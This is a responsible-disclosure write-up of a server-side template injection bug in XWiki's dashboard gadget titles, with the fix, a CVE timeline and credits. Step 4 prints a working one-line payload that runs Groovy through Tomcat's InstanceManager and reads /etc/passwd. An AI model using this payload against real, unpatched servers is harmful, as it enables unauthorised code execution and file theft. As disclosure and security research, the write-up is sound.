It all started with Users with SCRIPT right can access the application server instance manager and create arbitrary Java objects through $request binding. I tried other fields where similar payload for Server-Side Template Injection could work and found one more.

Short description:

Registered users are able to execute server side code via gadget title (Server-Side Template Injection).

Details:

Full path to reproduce:

  1. Open XWiki platform (I used http://playground.xwiki.org/ and local installation using docker image)
  2. Go to profile -> Edit -> My dashboard -> Add gadget
  3. Choose any gadget (e.g. content or python).
  4. Paste following payload into title (one line): $request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager") .newInstance("javax.script.ScriptEngineManager").getEngineByName("groovy").eval("new File('/etc/passwd').text")
  5. Submit the gadget

rce_gadget_title_playground_xwiki_org

Fix in source code: XWIKI-17794: Properly interpret velocity in gadget titles. So now evaluation of title is wrapped with check for user right ‘SCRIPT’.

Timeline:

  1. 14 Sep 2020 - reported to XWiki team
  2. 12 Jan 2021 - confirmed and fixed
  3. 18 May 2021 - published
  4. 28 May 2021 - CVE assigned

Acknowledgement

Thanks to d4d for helping with working payload.